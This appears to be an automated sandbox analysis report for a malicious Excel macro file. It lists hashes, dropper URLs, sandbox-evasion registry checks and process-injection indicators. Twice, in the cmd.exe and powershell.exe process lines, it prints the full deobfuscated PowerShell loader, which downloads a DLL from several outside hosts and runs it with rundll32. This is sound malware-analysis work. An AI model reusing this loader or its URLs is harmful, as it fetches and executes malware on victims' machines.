pload.zip
pload/865663204559_17_Nov_2021.xlsm
44KB
25-11-2021 16:48
477fd718bb764ffe3c5afde16c6c8dd2
eb932e19d95f88d64270d40cdc0b92c6d1cf63be
ee880ebdf26a1bcebe70a7ba17659199833c6107d758e26d37502bed9a225ee3
Extracted
Language | ps1 |
Deobfuscated |
|
URLs |
exe.dropper
https://evgeniys.ru/sap-logs/D6/ exe.dropperhttp://crownadvertising.ca/wp-includes/OxiAACCoic/ exe.dropperhttps://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/ exe.dropperhttp://immoinvest.com.br/blog_old/wp-admin/luoT/ exe.dropperhttps://yoho.love/wp-content/e4laFBDXIvYT6O/ exe.dropperhttps://www.168801.xyz/wp-content/6J3CV4meLxvZP/ exe.dropperhttps://www.pasionportufuturo.pe/wp-content/XUBS/ |
Filter: none
-
Process spawned unexpected child processcmd.exe
Description
This typically indicates the parent process was compromised via an exploit or macro.
Reported IOCs
description pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1164 3568 cmd.exe EXCEL.EXE -
Checks processor information in registryEXCEL.EXE
Description
Processor information is often read in order to detect sandboxing environments.
TTPs
Reported IOCs
description ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registryEXCEL.EXE
TTPs
Reported IOCs
description ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListenerEXCEL.EXE
Reported IOCs
pid process 3568 EXCEL.EXE -
Suspicious use of SetWindowsHookExEXCEL.EXE
Reported IOCs
pid process 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE 3568 EXCEL.EXE -
Suspicious use of WriteProcessMemoryEXCEL.EXEcmd.exe
Reported IOCs
description pid process target process PID 3568 wrote to memory of 1164 3568 EXCEL.EXE cmd.exe PID 3568 wrote to memory of 1164 3568 EXCEL.EXE cmd.exe PID 1164 wrote to memory of 2004 1164 cmd.exe powershell.exe PID 1164 wrote to memory of 2004 1164 cmd.exe powershell.exe
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\pload\865663204559_17_Nov_2021.xlsm"Checks processor information in registryEnumerates system info in registrySuspicious behavior: AddClipboardFormatListenerSuspicious use of SetWindowsHookExSuspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkjProcess spawned unexpected child processSuspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
-
memory/1164-276-0x0000000000000000-mapping.dmp
-
memory/2004-281-0x0000000000000000-mapping.dmp
-
memory/3568-118-0x00007FFB01D90000-0x00007FFB01DA0000-memory.dmp
-
memory/3568-119-0x00007FFB01D90000-0x00007FFB01DA0000-memory.dmp
-
memory/3568-120-0x00007FFB01D90000-0x00007FFB01DA0000-memory.dmp
-
memory/3568-121-0x00007FFB01D90000-0x00007FFB01DA0000-memory.dmp
-
memory/3568-124-0x000002518E870000-0x000002518E872000-memory.dmp
-
memory/3568-130-0x00007FFAFE220000-0x00007FFAFE230000-memory.dmp
-
memory/3568-131-0x00007FFB01D90000-0x00007FFB01DA0000-memory.dmp
-
memory/3568-132-0x00007FFAFE220000-0x00007FFAFE230000-memory.dmp
-
memory/3568-123-0x000002518E870000-0x000002518E872000-memory.dmp
-
memory/3568-122-0x000002518E870000-0x000002518E872000-memory.dmp